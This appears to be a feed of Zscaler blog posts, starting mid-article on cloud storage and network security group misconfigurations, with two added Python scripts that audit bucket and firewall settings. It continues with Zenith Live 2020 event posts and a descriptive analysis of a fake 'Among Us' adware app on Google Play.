Loose storage bucket access policies
Access policies not applied uniformly to all users
Contents within the storage bucket not being encrypted
Accessing contents from storage buckets over unsecured channels
Backup storage and objects within them not being encrypted
Impact
These misconfigurations can lead to unauthorized users getting access to the storage buckets with the potential to:
Download and expose proprietary data or sensitive data that are otherwise meant to be kept confidential
Upload malicious programs/files including malware/ransomware
Modify existing contents
Destroy backup storage buckets
Examples
In 2018, the misconfigured storage bucket of L.A. Times was open to the internet, which eventually led to a massive cryptojacking attack. Around the same time, Tesla’s cloud account was breached by hackers who used the account for malicious activities such as cryptomining. The hackers were able to break into Tesla’s cloud account because the account wasn’t password-protected. Earlier this year, Twilio, the cloud communications platform-as-a-service company, reported an incident in which a misconfigured S3 bucket allowed bad actors to get into and modify the TaskRouter JavaScript SDK.
Prevention
Apply a stringent, uniform access policy
The access policies applied to the storage buckets and the contents within them need to be stringent and uniform across all users. This will, if not eradicate completely, certainly minimize the instances of cloud storage getting exposed to the internet.
Instead of tying the access policies to a user, a role-based access policy will enforce uniform access policies across the users.
Encrypt the contents within storage buckets
Encrypt the contents within storage buckets using the strongest ciphers so that in case of a data breach, it will be difficult for attackers to get the actual contents. This will help organizations minimize the damage if an incident occurs.
Access contents from the storage buckets over encrypted channels
Access the storage buckets and the contents of the storage over a secured channel by enabling SSL/TLS protocols rather than using a plain HTTP protocol.
Secure back-up storage buckets and the contents within them
It is important to provide strict uniform access policies and encryption to the backup storage and the backed-up data within them.
Frequent audits of access policy and automation
It is recommended that organizations have a stringent audit process and perform frequent audits of storage bucket configuration settings and access policies. Sophisticated automation is essential for applying the best security practices uniformly across all users and to quickly detect any misconfigurations.
Robust alerting
It is very important to have a robust alerting mechanism in place to promptly notify cloud admins and users about misconfigurations.
Statistics
From the internal statistics collected by its CSPM organization, Zscaler observed that:
About 78 percent of user accounts had the “Block Public Access” option disabled, which poses a much bigger risk of the storage buckets owned by these users getting exposed to the internet.
Approximately 80 percent of accounts didn’t have disk encryption enabled and approximately 24 percent didn’t have encrypted Elastic Block Storage (EBS).
Surprisingly, 91 percent of storage accounts were using non-secured communication channels while accessing data.
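The storage prevention steps above and the logging prevention steps in the earlier "Lack of logging and monitoring" section (Block Public Access, default encryption, TLS-only access, access logging, lifecycle rules, and a CloudTrail trail persisted to S3) can be audited from the AWS API responses. This is an added example, not code from the original post or from Zscaler; the bucket and trail data are constructed dicts in the shape of the corresponding boto3 responses, with fictional bucket names.

```python
"""Audit S3 bucket settings and CloudTrail against the storage and logging
controls in the post: Block Public Access, default encryption, TLS-only
access, server access logging, lifecycle rules, and a trail that delivers
to S3 so history outlives the 90-day event window."""
import json


def tls_only_policy(bucket):
    """Bucket policy that denies any request not sent over TLS (the standard
    aws:SecureTransport deny pattern)."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "DenyInsecureTransport",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:*",
            "Resource": [f"arn:aws:s3:::{bucket}", f"arn:aws:s3:::{bucket}/*"],
            "Condition": {"Bool": {"aws:SecureTransport": "false"}},
        }],
    }


def _denies_plain_http(policy):
    """True if the policy document contains a Deny on aws:SecureTransport=false."""
    if not policy:
        return False
    doc = json.loads(policy) if isinstance(policy, str) else policy
    statements = doc.get("Statement", [])
    if isinstance(statements, dict):   # a single statement may be a bare object
        statements = [statements]
    for stmt in statements:
        cond = stmt.get("Condition", {}).get("Bool", {})
        if stmt.get("Effect") == "Deny" and str(cond.get("aws:SecureTransport", "")).lower() == "false":
            return True
    return False


def audit_bucket(name, cfg):
    """cfg keys mirror boto3 responses (get_public_access_block, get_bucket_encryption,
    get_bucket_policy, get_bucket_logging, get_bucket_lifecycle_configuration);
    an absent key stands for the API's 'no such configuration' error."""
    findings = []
    pab = cfg.get("PublicAccessBlockConfiguration", {})
    if not all(pab.get(k) for k in ("BlockPublicAcls", "IgnorePublicAcls",
                                    "BlockPublicPolicy", "RestrictPublicBuckets")):
        findings.append(f"{name}: Block Public Access not fully enabled")
    if not cfg.get("ServerSideEncryptionConfiguration", {}).get("Rules"):
        findings.append(f"{name}: no default server-side encryption")
    if not _denies_plain_http(cfg.get("Policy")):
        findings.append(f"{name}: policy does not deny non-TLS access")
    if "LoggingEnabled" not in cfg:
        findings.append(f"{name}: server access logging disabled")
    if not cfg.get("Rules"):   # lifecycle rules
        findings.append(f"{name}: no lifecycle configuration")
    return findings


def audit_cloudtrail(trails):
    """trails: dicts merging describe_trails() entries with get_trail_status()['IsLogging']."""
    good = [t for t in trails
            if t.get("IsLogging") and t.get("IsMultiRegionTrail") and t.get("S3BucketName")]
    return [] if good else ["cloudtrail: no active multi-region trail delivering to S3"]


# Constructed sample: one neglected bucket and one hardened bucket (fictional names).
SAMPLE_BUCKETS = {
    "corp-backups": {
        "PublicAccessBlockConfiguration": {"BlockPublicAcls": True, "IgnorePublicAcls": False,
                                           "BlockPublicPolicy": True, "RestrictPublicBuckets": False},
    },
    "corp-cloudtrail-logs": {
        "PublicAccessBlockConfiguration": {"BlockPublicAcls": True, "IgnorePublicAcls": True,
                                           "BlockPublicPolicy": True, "RestrictPublicBuckets": True},
        "ServerSideEncryptionConfiguration": {
            "Rules": [{"ApplyServerSideEncryptionByDefault": {"SSEAlgorithm": "aws:kms"}}]},
        "Policy": json.dumps(tls_only_policy("corp-cloudtrail-logs")),
        "LoggingEnabled": {"TargetBucket": "corp-access-logs", "TargetPrefix": "cloudtrail/"},
        "Rules": [{"ID": "expire-after-1y", "Status": "Enabled", "Filter": {},
                   "Expiration": {"Days": 365}}],
    },
}
SAMPLE_TRAILS = [{"Name": "org-trail", "S3BucketName": "corp-cloudtrail-logs",
                  "IsMultiRegionTrail": True, "IsLogging": True}]


def run_sample():
    findings = audit_cloudtrail(SAMPLE_TRAILS)
    for name, cfg in SAMPLE_BUCKETS.items():
        findings.extend(audit_bucket(name, cfg))
    return findings


if __name__ == "__main__":
    print("\n".join(run_sample()) or "no findings")
```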
While most of the unsecured communication channels were found when other modules were trying to access the contents from these buckets, most of the accounts had the SSL/TLS option enabled for content access from the internet. Some accounts still used HTTP instead of HTTPS while accessing objects remotely from the internet, which is more than enough for attackers to get access to the storage buckets and abuse them for malicious activities. Most Azure accounts had the storage buckets encrypted. This is probably the result of Azure’s default option of enforcing encryption on storage buckets. A small step like this can help to ensure uniform enforcement of security policies. About 85 percent of Azure accounts didn’t have a default network access rule set to deny. This can possibly expose the network to the internet and bad actors.
Network security groups
A network security group is like a network firewall that protects cloud workloads from the internet. The network security group controls the traffic coming in and going out of the cloud-based servers/systems based on the rules enforced. Misconfigurations in network security groups are the second most widely observed misconfigurations after misconfigurations in storage buckets. These misconfigurations can be the result of unintentional human error. At times, IT admins and/or users open the rules in the network security group for specific purposes such as debugging or allowing legitimate network operations remotely. But, when finished, they sometimes forget to revert to the more stringent rules in the network security group/policy, which hackers can leverage to penetrate the cloud-based systems. Cloud users often have a tendency to rely on the default policy, which is sometimes insufficient for adequate security.
Impact
Improper rules configured to protect cloud-based systems allow bad actors to probe the network and, through reconnaissance, identify the servers and services on them that are open to the internet. Attackers can go beyond reconnaissance and conduct denial-of-service (DoS) or distributed denial-of-service (DDoS) attacks by continuously sending large numbers of ICMP packets (known as an ICMP flood or ping flood) to a cloud-based server, over-utilizing server resources and/or choking the internet pipe. Misconfigured network security groups allow attackers to abuse exposed services and ports to make their way into cloud-based systems through a brute-force attack or by exploiting known vulnerabilities. By opening up multiple concurrent connections, attackers can also conduct DoS attacks and bring systems down. Once bad actors get in, they can perform any illegitimate activity, such as stealing sensitive data or making it publicly available, implanting malware or ransomware, and moving laterally to other systems.

Examples
Last year, a sophisticated P2P botnet named FritzFrog was discovered to have been actively abusing the SSH service for many months and was believed to have infected hundreds of servers. Earlier this year, Sophos identified the Cloud Snooper attack, which bypassed all security measures. According to the results of their investigation, the attacker is believed to have penetrated an internet-exposed SSH service using a brute-force technique. Also this year, Kaiji, new Chinese Linux malware targeting IoT devices and servers, is believed to use a similar SSH brute-force technique to penetrate and spread.

Prevention
Zscaler highly recommends implementing a zero trust network access (ZTNA) architecture to safeguard all your applications and allow only authorized users to access them.
If done right, using solutions like Zscaler Private Access, you can completely eliminate the external attack surface by blocking all inbound communication and preventing lateral propagation from an infected system. For organizations still in the process of implementing ZTNA, here are some short-term best practices for creating network security group/policy rules and applying them to cloud resources, to minimize the risk of becoming an easy target for attackers.

Block inbound traffic to certain services and database servers from the internet
It is critical to block incoming traffic to services such as SSH and RDP by blocking inbound sessions from the internet to TCP port 22 and TCP port 3389, respectively. Exposing database services to the internet can have dangerous repercussions, so incoming traffic from the internet to database services must be blocked. If these services run on other, non-standard ports, block those ports explicitly. It is false to assume that services are hidden from attackers because they run on non-standard ports; it is not difficult for hackers to find them. If it is necessary to open up those services for legitimate network operations or remote debugging, restrict them to a specific set of IP addresses, never to the entire internet.

Restrict outbound traffic
Don't ignore the outbound filters and rules; set them as stringently as possible. Restrict outbound server traffic to only those ports and IP addresses that the services need to reach for legitimate operations. These restrictions help reduce the lateral spread of infection or data exfiltration if a system is compromised, thereby minimizing the damage.

Block reconnaissance attempts
Since ICMP ping is a very handy tool for testing network connectivity, it is often used to discover systems.
Block inbound and outbound ICMP traffic to make it harder for bad actors to learn where the servers are. Block port scanning and IP scanning attempts. Scanning is mostly done in the initial phase, when attackers try to identify the systems and services they can target.

Network segmentation
Network segmentation designed with security in mind is absolutely critical because it is instrumental in limiting data breaches and reducing damage. Deploy Network Detection and Response to monitor traffic in real time so that threats can be identified and mitigated quickly.

Apply security patches promptly and always run the latest versions
It is imperative to apply the latest available security patches for the applications and services running on cloud-based systems. Running older versions of software makes systems more vulnerable to exploitation and can eventually lead to a severe incident.

Statistics
Though the percentage of resources that were completely open to the internet was as low as 5 percent, this is still too high. Attackers can, and do, leverage these misconfigurations to gain full access to an organization's cloud environment. Zscaler found 26 percent of servers still exposing their SSH ports to the internet and about 20 percent of servers with RDP exposed. These numbers remain very high and heighten the risk of cloud-based resources becoming compromised.

Conclusion
The use of public clouds is growing, and so are the attacks targeting them. But that doesn't mean public clouds are risky and organizations should stay away from them. The ThreatLabZ research showed that most successful cyberattacks on public cloud instances are caused by security misconfigurations rather than by vulnerabilities in the infrastructure itself. Organizations can take simple steps to ensure that their configurations are secure and their data is protected.
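The short-term network security group practices above (no SSH, RDP or database listeners reachable from the internet, administrative access pinned to specific addresses, outbound traffic limited to required ports and destinations, ICMP not open to the world) can be checked mechanically before a rule set is applied, which is also how the 26 percent SSH and 20 percent RDP exposure figures above would be measured in one's own estate. The script below is an added example, not code from the post or from any Zscaler product. The rule dict format is an assumption; a real security-group or NSG export would be translated into it first. The sample rules and addresses are constructed (203.0.113.0/24 is a documentation range, 10.0.2.0/24 a private one).

```python
"""Network security group rule audit (added example, constructed rule set)."""
import ipaddress

# Services the post singles out, plus common database listeners.
WATCHED_PORTS = {
    22: "SSH", 3389: "RDP",
    1433: "MSSQL", 3306: "MySQL", 5432: "PostgreSQL", 27017: "MongoDB",
}


def covers_internet(cidr: str) -> bool:
    """True for an 'anywhere' peer such as 0.0.0.0/0 or ::/0.
    Split ranges like 0.0.0.0/1 plus 128.0.0.0/1 would need a union check."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0


def rule_ports(rule: dict):
    """Inclusive port range of a rule; (None, None) means all ports."""
    lo = rule.get("from_port")
    hi = rule.get("to_port", lo)
    return lo, (hi if hi is not None else lo)


def audit_rules(rules: list) -> list:
    """Return human-readable findings, one per violated practice."""
    findings = []
    for r in rules:
        if r.get("action", "allow") != "allow":
            continue  # deny rules cannot open anything
        name, proto = r["name"], r.get("protocol", "any")
        inbound = r["direction"] == "inbound"
        peer = r["source"] if inbound else r["destination"]
        if not covers_internet(peer):
            continue  # pinned to specific addresses: acceptable short-term
        lo, hi = rule_ports(r)
        all_ports = lo is None
        if inbound:
            if proto in ("icmp", "any"):
                findings.append(f"{name}: ICMP reachable from the internet (aids host discovery)")
            if proto in ("tcp", "any"):
                if all_ports:
                    findings.append(f"{name}: all TCP ports open inbound from the internet")
                else:
                    for port, svc in WATCHED_PORTS.items():
                        if lo <= port <= hi:
                            findings.append(f"{name}: {svc} (tcp/{port}) open inbound from the internet")
        else:
            if all_ports:
                findings.append(f"{name}: unrestricted outbound (all ports to anywhere)")
            elif proto == "icmp":
                findings.append(f"{name}: outbound ICMP to anywhere")
            else:
                findings.append(f"{name}: outbound {proto}/{lo}-{hi} to anywhere; pin the destination addresses")
    return findings


# Constructed sample rule set; addresses are documentation/private placeholders.
SAMPLE_RULES = [
    {"name": "web-https", "direction": "inbound", "protocol": "tcp",
     "from_port": 443, "to_port": 443, "source": "0.0.0.0/0"},
    {"name": "ssh-anywhere", "direction": "inbound", "protocol": "tcp",
     "from_port": 22, "to_port": 22, "source": "0.0.0.0/0"},
    {"name": "ssh-bastion", "direction": "inbound", "protocol": "tcp",
     "from_port": 22, "to_port": 22, "source": "203.0.113.10/32"},
    {"name": "rdp-debug", "direction": "inbound", "protocol": "tcp",
     "from_port": 3389, "to_port": 3389, "source": "::/0"},
    {"name": "mysql-any", "direction": "inbound", "protocol": "tcp",
     "from_port": 3306, "to_port": 3306, "source": "0.0.0.0/0"},
    {"name": "ping-any", "direction": "inbound", "protocol": "icmp",
     "source": "0.0.0.0/0"},
    {"name": "egress-all", "direction": "outbound", "protocol": "any",
     "destination": "0.0.0.0/0"},
    {"name": "egress-updates", "direction": "outbound", "protocol": "tcp",
     "from_port": 443, "to_port": 443, "destination": "0.0.0.0/0"},
    {"name": "egress-db", "direction": "outbound", "protocol": "tcp",
     "from_port": 5432, "to_port": 5432, "destination": "10.0.2.0/24"},
    {"name": "deny-rest", "direction": "inbound", "protocol": "any",
     "action": "deny", "source": "0.0.0.0/0"},
]

if __name__ == "__main__":
    for line in audit_rules(SAMPLE_RULES):
        print(line)
```

The bastion rule passes because its source is a single address, while the identical port opened to 0.0.0.0/0 is flagged; that is the distinction the post draws between exposing a service to the internet and restricting it to a specific set of IP addresses. Port-restricted egress to anywhere is reported separately from an all-ports egress rule so that a team can triage the second before the first.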
Tue, 08 Dec 2020 08:30:01 -0800 Deepen Desai

Zscaler Cloud Protection, CXO Voices, Women in IT, and Meeting an Astronaut
This post originally appeared on LinkedIn.

It's amazing what an enterprise can accomplish when its IT professionals go beyond the limits of legacy applications, legacy architectures, and legacy thinking. Today, I and twelve thousand-plus close friends joined enterprise IT leaders and Zscaler execs for the first day of Zenith Live 2020 for the Americas region. Zenith Live is looking a little different this year. For the first time, the premier global cloud summit is virtual, with all sessions online and available for free. Below are a few day-one highlights.

Zscaler CEO Jay Chaudhry kicked off the event with his keynote, in which he highlighted how the cloud has become the new data center and the internet has become the new corporate network. He began his talk with a heartfelt thank-you to IT professionals around the globe, noting that in the last ten months they have been called upon to go beyond their typical call of duty to enable secure remote access for their respective workforces. He cited DB Schenker and Siemens, two companies that were able to pivot tens, even hundreds, of thousands of employees to work-from-anywhere in a matter of days.

Today, we announced Zscaler Cloud Protection, a comprehensive portfolio that simplifies and automates protection for workloads on and between any public cloud. Zscaler Cloud Protection combines Cloud Security Posture Management, Workload Segmentation, Cloud Connector, and the proven power of Zscaler Internet Access and Zscaler Private Access.

Zscaler President and CTO Amit Sinha was joined by Zscaler CIO Patrick Foxhoven for an illuminating session highlighting several new Zscaler product and service innovations. Amit walked through the four key pillars of the Zscaler Zero Trust Exchange.
Patrick shared some of the machine-learning analysis now available for Zscaler Private Access (ZPA) customers, and provided an overview of how ZPA can now perform "rich forms of inspection" of customer data "on the connector," protecting the privacy of the data and ensuring no impact to throughput or performance.

I had the privilege of speaking with Captain Scott Kelly, U.S. astronaut and former commander of the International Space Station. The American record-holder for the most consecutive days spent in outer space, Captain Kelly shared his unique perspectives on perseverance, resilience, and pushing beyond one's limits, and emphasized the importance of taking risks, being willing to make mistakes, and at times even being willing to fail. His mother became one of the first female police officers in New Jersey, and her story inspired him: “She had a plan,” explained Captain Kelly. “She worked hard. And she never ever gave up. And this was the first time in my life I saw the power of having this goal you might not be able to achieve, a plan to get there, and working really, really hard at something."

Though I didn't get to join them in every session (!), Zenith Live attendees participated in close to fifty breakout sessions. Top draws for today included presentations on Zscaler CASB features, Zscaler Internet Access (ZIA), and Cloud Firewall/Cloud IPS.

Finally, I moderated a panel of four IT leaders in the session "Women in IT: Confidence and Collaboration Bring IT Career Success." I spoke with Jaya Ramaswamy, SVP and CIO at Hitachi America, Ltd.; Amy Brady, CIO at KeyBank; Katie Jenkins, EVP and CISO at Liberty Mutual; and Jody Davids, former CIO at PepsiCo. We discussed career planning, developing support networks, instilling a growth mindset, and achieving work/life balance.
Jody stressed the importance of confidence, and counseled attendees to step out of their comfort zones, "develop resilience," and especially to collaborate: "It's good for the team, it's good for the enterprise."

Join me tomorrow for day two of Zenith Live 2020. We'll hear Zscaler customer stories from Takeda Pharmaceutical Company, Manpower Group, and other innovators. My colleagues Amit and Patrick will be back with more exciting product announcements, and you won't want to miss our day-two keynote from Wired Magazine journalist Andy Greenberg, the author of Sandworm, and the man who tracked the outbreak of the NotPetya malware.

Tue, 08 Dec 2020 18:00:09 -0800 Kavitha Mariappan

T-Minus 24 Hours Until Zenith Live Liftoff
It's almost here: Zenith Live mission control is ready to launch the first Zenith Live Virtual Cloud Summit tomorrow, December 8, starting at 8:30 a.m. (PST). The summit begins with an opening keynote from Zscaler CEO and Founder Jay Chaudhry. In addition to welcoming you to our third annual Zenith Live, Jay is sure to inspire with his perspectives on the state of the industry, the changes we saw in 2020, and the need for a zero trust approach to enable secure digital transformation.

Quickly following Jay's opening remarks:
- An Innovation Showcase led by Zscaler CTO and President Amit Sinha, who digs down into current and upcoming innovations from Zscaler's Zero Trust Exchange, and how they help companies advance their secure digital transformation journey.
- Voice of the Customer talks with pioneering IT leaders from companies such as Johnson Controls, Cushman & Wakefield, and Takeda Pharmaceuticals Company, discussing how zero trust created agility and resiliency in their enterprises.
- As the American record holder for the most consecutive days spent in space, Captain Scott Kelly (day 1) will share his unique perspectives on testing one's limits, the infinite wonder of the galaxy, and the indomitability of the human spirit.
- Wired reporter and acclaimed author Andy Greenberg (day 2) will discuss how a Russian state-sponsored cybercriminal gang launched the most devastating cyber attack ever, all chronicled in his book Sandworm.
- Microsoft keynote (day 2), where Zscaler's partner showcases how our combined solutions bring better identity, visibility, and application performance to help enterprises better prepare for the cloud- and mobile-first world.
- Breakout sessions with content focused on the Zscaler solution foundations, the Zscaler Zero Trust Exchange platform, the secure access service edge (SASE) model, network transformation, security transformation, data protection, digital user experiences, and more.
- CxO panels, where you can learn how CIO, CTO, and CISO pioneers from Fortune 500 companies successfully enacted secure digital transformation and overcame cultural and technological issues.
- Women in IT panel, where you can hear successful IT leaders discuss expanding opportunities for women in the IT industry, share practical approaches and considerations to break down barriers to individual success, and highlight IT executive career progression strategies.
- Architectural workshops featuring Zscaler expert architects sharing their experiences leading network, security, and application transformations while reinventing safe connections in the cloud- and mobile-first era.
- Ask the Experts, where experts lead an interactive session on how SASE and zero trust architectures can launch your organization beyond limits using secure digital transformation first steps, practices, and outcomes.
- Live Q&A demos that let you watch Zscaler experts explain exactly how to deploy and configure zero trust in your environments.
- Training tracks that will build your team's experts in deploying zero trust and SASE to solve your business challenges.
Between sessions, be sure to visit the virtual Partner Hall, which showcases our ecosystem of IT transformation partners that help enterprises secure and simplify their adoption of cloud and mobility. And don't forget to participate in the summit-wide virtual game. Get points for every Zenith Live activity: attending a technical breakout, visiting a partner booth, watching a CxO panel, participating in a Q&A session, and more. The highest point earners at the end of the conference win a cool swag package. Register today and join us tomorrow!

Mon, 07 Dec 2020 08:00:52 -0800 David Avery

Simplifying and Automating Cloud Workload Protection
As enterprises migrate from legacy data centers to the cloud, agility and speed often come at the expense of security. This doesn't mean that the cloud is inherently insecure, however. In fact, Gartner has predicted that by 2023, 99 percent of cloud security incidents will be the enterprise's own fault. The culprits? Well-intentioned employees with little knowledge of secure cloud configuration, and the complexity of migrating static, legacy security architectures to highly dynamic cloud environments.

The last few decades of information security have taught us that complexity is the enemy of security, and that layering appliances and complicated policies leads to oversight and human error, or even worse, security compromises made to avoid that complexity. These challenges are exacerbated by the highly dynamic nature of today's DevOps-driven cloud deployments, putting security teams at odds with development teams.

Things don't need to be this difficult. Cloud protection can best be achieved through a relatively simple strategy of securely configuring cloud deployments, minimizing your exposed attack surface, and eliminating lateral movement of malicious software and bad actors.
Automation and easy-to-understand, business-level policies can ensure that your cloud security strategy adapts automatically and immediately to the changing nature of your cloud deployments, with minimal risk of human-caused error.

Monitor and remediate cloud security posture
The first step in protecting your cloud deployment is to securely configure all infrastructure and services. Developers and DevOps teams, who are not typically security experts, are moving fast to meet tight deadlines, often overlooking important configuration steps as they spin up new services. Upon deployment, and continuously thereafter, these services must meet both internal control and regulatory requirements.

Secure app access with no attack surface
Once your infrastructure and services have been securely configured, the next piece of the puzzle is providing secure workforce and B2B access to cloud applications. Zero trust approaches make private apps invisible to the internet while allowing authorized users to access those applications. Because there is no VPN, the corresponding complexity and poor user experience can be avoided entirely.

Secure app-to-app communication across clouds
Once lateral threat movement has been eliminated across your cloud infrastructure, the next step is to secure workload communications to the internet, to other clouds, and to your data centers (DCs). Often overlooked, today's workloads have legitimate needs for internet access, ranging from API connections to third-party services to software updates and more. These workloads must be protected with the same level of security and control afforded to employee internet access. Proper implementation of this step means that your workloads will have safe, controlled access to required internet-based services with no exposed attack surface and no unwanted connections. Cloud-to-cloud and cloud-to-DC communications are another important component of security for your cloud footprint.
Secure connectivity that can be deployed and updated quickly across any cloud or DC allows your cloud security infrastructure to adapt to the changing needs of the business.

Eliminate lateral threat movement
Even after environments have been configured for security best practices, it is still possible for bad actors, such as malicious insiders or hackers leveraging compromised credentials—or malware and ransomware—to wreak havoc on flat networks that allow unchecked lateral movement. Network-based firewall policies are static and unmanageably complex, leading to human error and stale policies that either expose workloads or are purposefully circumvented. Passthrough, stream-based firewall architectures exacerbate the problem. Identity-based segmentation offers a path toward eliminating the attack surface within and across clouds to stop lateral movement without the daunting complexities of network segmentation. Extending the network across clouds without VPN means eliminating the complexity, overhead, cost, and slowness of managing transit gateways, transit hubs, virtual firewalls, VPNs, routers, networking policies, and peering.

Zscaler Cloud Protection, combining Cloud Security Posture Management, Workload Segmentation, Cloud Connector, and the proven power of Zscaler Internet Access and Zscaler Private Access, offers you a path toward this new reality. Contact us to learn more or see a custom demo.

Tue, 08 Dec 2020 08:09:36 -0800 Rich Campagna

FireMon and Zscaler Highlight Access Policy Management at Zenith Live 2020
Zenith Live is happening next week, and while you're at this year's virtual summit, we hope you will take time to check out our sponsors' booths in the Virtual Partner Hall. As a Zenith Live Gold Sponsor, FireMon will be there highlighting the combined FireMon and Zscaler solution and how it provides enterprises with better company-wide access policy management and visibility.
Leveraging Zscaler's API, FireMon applies real-time policy analysis to ensure effective enforcement and network segmentation are in place. Customers can visualize configuration, policy, and rule usage statistics across all network security enforcement points through a single pane of glass. This centralized management approach allows customers to validate policies against regulatory or corporate standards, analyze access across the network, and monitor change to pinpoint risks quickly.

Zscaler and FireMon provide:
- Policy Management. Normalize and manage policies across firewalls, next-generation firewalls, and cloud environments from various vendors from a single pane of glass.
- Policy Validation. Validate policies against regulatory requirements or custom-defined policies.
- Access Analysis. Confirm Zscaler security controls enforce the desired enterprise-wide access, security, and compliance policies.
- Rule Base Compliance. Monitor and ensure security controls continuously maintain compliance with defined access and rule policies. Identify rule, access, and configuration compliance violations.
- Network Mapping. Automatically collect and build Zscaler Cloud Firewall data into a visual and interactive model that provides network abstraction of access paths end-to-end, with access path analysis and network map visualization.
- Rule Review. Analyze firewall configurations to identify hidden, unused, shadowed, or overly permissive rules that provide more access than necessary.
- Change Tracking. Track changes to Zscaler Cloud Firewall rules for compliance or rule review analysis. Ensure changes are certified. Identify when a change occurred, who made the change, and whether it was expected, and determine if the difference created a negative impact.

See how the Zscaler and FireMon integration works: using FireMon, joint customers can visualize and manage Zscaler Advanced Cloud Firewall policies alongside traditional firewalls and other network security policy enforcement points.
This simplifies migration and ensures continuous visibility, control, and compliance across hybrid network environments. Check out the video below, describing how the partnership between Zscaler and FireMon helps secure digital transformation.

Register now for Zenith Live—a virtual and free event starting December 8, 2020. Visit FireMon's booth to learn more or talk to a FireMon expert about integrating Zscaler and FireMon solutions for better, more secure digital transformation.

Mon, 30 Nov 2020 17:48:48 -0800 Amit Raikar

Go Beyond Limits in Zenith Live's Virtual Game
We're looking forward to seeing you at Zenith Live 2020 Virtual Cloud Summit on December 8-10. At Zenith Live, you can join other IT leaders and pioneers creating real change in their organizations by leading the drive to a mobile, cloud-first future. The theme of Zscaler's third annual cloud conference is “Beyond Limits.” Take the opportunity to go beyond limits during the conference: your mission is to blow out our conference-wide game and rack up tons of points on the Zenith Live leaderboard in our Virtual Lounge! You can help some important charities in the process.

For each activity during the conference—attending a breakout session, visiting a partner booth, watching a CxO panel, participating in a Q&A lecture, etc.—you earn “mission” points. The highest point earners at the end of the conference will win a cool swag package!*
- First prize. $100/€100 Amazon voucher, a Zenith Live T-shirt, and Andy Greenberg's book Sandworm.
- Second prize. $50/€50 Amazon voucher, a Zenith Live T-shirt, and Andy Greenberg's book Sandworm.
- Third prize. A Zenith Live T-shirt and Andy Greenberg's book Sandworm.

You can find a list of activities and their associated mission point values in the Virtual Lounge once Zenith Live begins. Daily scores are tabulated on Zenith Live's mission scoreboard. When you're in the virtual lounge, don't forget to take a picture and socialize it on Twitter using #ZenithLive.
Play the Whack-a-Threat game as well! Both activities earn mission points towards winning the game!

Part of Zenith Live's beyond limits mission is giving back to the community. We encourage you to explore and support two charities during the conference:
- Global Food Banking Network. The Global FoodBanking Network (GFN) is an international non-profit organization that nourishes the world's hungry by uniting and advancing food banks in more than 40 countries.
- Girls Who Code. Girls Who Code is an international non-profit organization working to close the gender gap in technology and change the image of what a programmer looks like and does.

We hope you'll donate to these worthwhile charities before, during, and after Zenith Live. Leaderboard prize winners also have the option of donating the value of their prize to one of the above charities.

Good luck with the game! Go beyond limits and explore every corner of Zenith Live to get the maximum number of points. Check the leaderboard daily to see who is in the lead. This year's summit features inspiring speakers and practical training for CxOs, IT execs, network architects, security managers, and business leaders who seek secure digital transformation beyond limits. Register now.

*Some conference attendees are not allowed to accept gifts from third parties. Please check with your organization as to their policies.

Fri, 27 Nov 2020 12:34:07 -0800 David Avery

Among Us Imposter on Google Play
Developing an app that is downloaded millions of times means success for the developer. But, quite often, it also means the app becomes a target for cybercriminals. This is the case with the wildly popular game Among Us. The game has been downloaded more than 100 million times from the Google Play store, so it's not surprising that the Zscaler ThreatLabZ team has discovered a fake app portraying itself as Among Us, attempting to cash in on the real game's popularity. The fake app is titled Amoungus.
It cleverly makes a minor spelling change to the name and uses a picture similar to the one in the real app (shown in Figure 1). Users who are not very familiar with the app but have heard about it can be fooled into thinking this is the actual game. Once installed, Amoungus displays some fake downloading and processing activity, leading the user to think the game is downloading additional features required for an Android device. Soon after downloading the app, the user is bombarded with advertisements. There is no gaming functionality; the app is simply adware with the potential functionality to steal Gmail credentials. The app asks users to log in or register using Gmail credentials, but the current version does not send the credentials to the attacker. This functionality seems to be under development and could be activated with future updates. Such functionality could be devastating, providing attackers with access to volumes of personal and financial information.

App details
App Name: Amoungus
Package Name:
Hash: 3d1e6b84b50e9dbcfdc6b609aa57d28fa06f78e1f3cd9285e07ba8e39f419bfb

Technical details
The app portrays itself as the Among Us Android game app. [Disclaimer: This blog discusses the technical details of the fake app Amoungus, discovered on the Google Play store, not the real Among Us app.] As shown in Figure 1, the left image is of the actual game (which has around 100 million downloads), and the right is the fake app.

Figure 1: The real Among Us vs. the fake app on Google Play.

When checking the user reviews for the fake app, it becomes pretty obvious that the app is not doing what is described on its Google Play description page. Figure 2 shows some user reviews, which clearly indicate that this is a potentially unwanted app (PUA).

Figure 2: User reviews for the Amoungus app on Google Play.

Upon installation, the app appears to be downloading additional game features, as well as loading and processing those features.
This is a common activity in other games, such as PUBG, Call Of Duty, Asphalt, and more, in which the game loads additional features from the server to enhance gameplay or improve functionality. This activity tricks the user into thinking this app is an actual game. Figure 3 shows this functionality in action.

Figure 3: The initial downloading and processing activities of the Amoungus app.

In reality, these are nothing more than videos created by the attacker to mimic game functionality. Figure 4 shows how this functionality is used and how the videos are loaded from the Resources directory.

Figure 4: The videos for this fake app are stored in the Resources directory.

The app also sends details about the user's device to the server. Some of the details include:
- Android SDK version
- Android model
- Network operator name
- Device manufacturer
- Cell signal level
- Height and width of the Android display
- Device root details
- Time since last boot
- Device RAM status

The user is then bombarded with advertisements, as seen in Figure 5.

Figure 5: Some of the ads sent to the victim.

One unique feature of this app is the functionality to steal Gmail credentials. The app asks the user to log in or register using a Gmail user name and password, although the stolen credentials are not sent back to the attacker. This functionality seems to be under development and hypothetically could be an ideal way to thwart Google Play's detection: the current version of the app doesn't steal data, but later updates might include this functionality.

Figure 6: The login and register screens of the fake app.

When trying to log in or register, the user is returned to the login page in a continuous loop. Figure 7 shows the functionality where the user is looped around the same process once a user name and password are provided.

Figure 7: The login or register functionality on a continuous loop.

Further research showed that the developer had other fake apps on Google Play mimicking other famous apps.
We analyzed the other fake apps and found that they all behaved in the same fashion as the fake Among Us app. Initially, videos are played showing the downloading and processing activity, and the user is bombarded with ads along with Gmail ID and password prompts, which again are sent nowhere. Figure 8 shows other apps from the same developer.

Figure 8: Other fake apps on Google Play by the developer of Amoungus.

Listed below are the names of the fake apps shown in Figure 8 with their approximate numbers of downloads.
- Fauji Game: 10,000+
- Lite for Resident Evil: 10,000+
- Like for Call of Fire: 50+
- Amoungus: 5,000+
- Fdnmg: 1+
- Betok Indian Short Videos: 10+
- Clash of Coins: 10+
- Battle Royale Action Game: 5,000+

